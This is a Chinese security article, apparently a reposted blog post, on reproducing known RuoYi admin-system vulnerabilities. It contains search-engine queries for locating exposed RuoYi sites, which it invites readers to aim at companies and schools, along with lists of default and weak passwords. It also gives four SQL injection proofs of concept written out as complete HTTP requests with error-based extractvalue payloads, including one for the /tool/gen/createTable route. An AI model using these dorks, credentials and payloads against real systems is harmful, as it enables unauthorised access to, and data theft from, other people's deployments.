文章总结： 该文档详细介绍了若依后台管理系统的多个已知漏洞复现方法，包括弱口令攻击和四个SQL注入点，提供了具体的POC、请求包示例和漏洞利用步骤。文档还包含若依系统的特征识别方法和搜索语法，旨在帮助安全人员学习漏洞挖掘思路和技术实践。 综合评分： 78 文章分类： 漏洞分析,WEB安全,渗透测试,实战经验,安全工具

edu漏洞之若依nday漏洞复现(一)

小轩 小轩

响应云Sec

2026年4月23日 22:10 广东

在小说阅读器读本章

去阅读

响应云Sec

免责声明

由于传播、利用本公众号所提供的信息而造成的任何直接或者
间接的后果及损失，均由使用者本人负责，公众号响应云Sec
及作者不为此承担任何责任，一旦造成后果请自行承担！

0X01前言

想必很多师傅想挖管理系统的漏洞 但不知道有何处下手而烦恼吧！

今天分享的是若依nday漏洞复现，虽然这个系统的漏洞已经是很常见的了，比较出来了很久 老师傅们也都会，刚初来驾到的师傅可以好好看看 也是为了学习思路和技术，在我看来思路是比较重要的 有了思路打洞的流程会变的快很多，好比在一个站点用工具乱扫。 好哒，师傅们做好小板凳出发了！> _ <

若依nday漏洞搜索语法

(icon_hash="-1231872293" || icon_hash="706913071") //这个是fofa的icon

web.body="若依后台管理系统" //鹰图的

//师傅们可以自己修改语法 去搜索想要的站点 企业 学校都可以

若依后台管理系统的特征

1.若依系统最经典的加载界面

2.blade登录后台网站特征

3.icon图标

若依nday漏洞一

弱口令：

admin ruoyi druid   //账号
123456 admin druid admin123 admin888  //密码
但是常用的是admin:amdin123/ry:admin123

若依nday漏洞二

SQL注入：

[所有操作都需要修改登录后的JSESSIONID值]

都是POST请求方式

注入点一 在角色管理页面的请求包

POC:

POST /system/user/list HTTP/1.1
Host: xxx
Content-Length: 153
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36
Accept: application/json, text/javascript, /; q=0.01
Content-Type: application/x-www-form-urlencoded
Origin: xxx
Referer: xxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=410264c7-c5f3-4699-aba3-6211b8986bea
Connection: keep-alive

pageSize=10&pageNum=1&orderByColumn=createTime&deptId=&parentId=&loginName=&phonenumber=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=&isAsc=desc,0

注入点二：角色编辑处

POST /system/user/edit HTTP/1.1
Host: xxx
Content-Length: 232
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36
Accept: application/json, text/javascript, /; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: xxx
Referer: xxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=410264c7-c5f3-4699-aba3-6211b8986bea
Connection: keep-alive

userId=2&deptId=105&userName=%E8%8B%A5%E4%BE%9D&dept.deptName=%E6%B5%8B%E8%AF%95%E9%83%A8%E9%97%A8&phonenumber=15666666666&email=ry%40qq.com&loginName=ry&sex=1&role=2&remark=%E6%B5%8B%E8%AF%95%E5%91%98&roleIds=2&postIds=2&status=0,1

注入点三：角色导出处

POST /system/role/export HTTP/1.1
Host: xxx
Content-Length: 75
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: xxx
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: xxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: o0At_2132_saltkey=JW6Gt2hb; o0At_2132_lastvisit=1691240426; o0At_2132_ulastactivity=2db4EUfD9WS50eLvnip%2B9TxK2ZhcO65vPL0dA6sPVF8AQSBMa6Qn; JSESSIONID=cfcf2d1f-f180-46cf-98bb-5eacc4206014
Connection: close

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

sql注入四：RuoYi4.7.5版本后台sql注入

ruoyi-4.7.5 后台 com/ruoyi/generator/controller/GenController 下/tool/gen/createTable路由存在sql注入。
POC：
sql=CREATE table ss1 as SELECT/**/* FROM sys_job WHERE 1=1 union/**/SELECT/**/extractvalue(1,concat(0x7e,(select/**/version()),0x7e));

师傅们今天就到这里 下期我们再见！！！>_< 晚安

• END –

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：响应云Sec 小轩 小轩《edu漏洞之若依nday漏洞复现(一)》